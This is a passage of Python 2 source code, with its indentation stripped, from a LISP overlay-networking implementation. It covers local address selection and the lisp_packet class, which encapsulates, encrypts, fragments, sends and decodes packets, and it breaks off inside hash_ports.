# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
dport = socket.htons(self.udp_dport) if self.outer_version == 4 else \
self.udp_dport
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate..
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES that
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. We can get our address when we thought
# we could encap. So lisp_packet.outer_source has the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix outer header. So that
# logic is semantically repliciated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error, e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
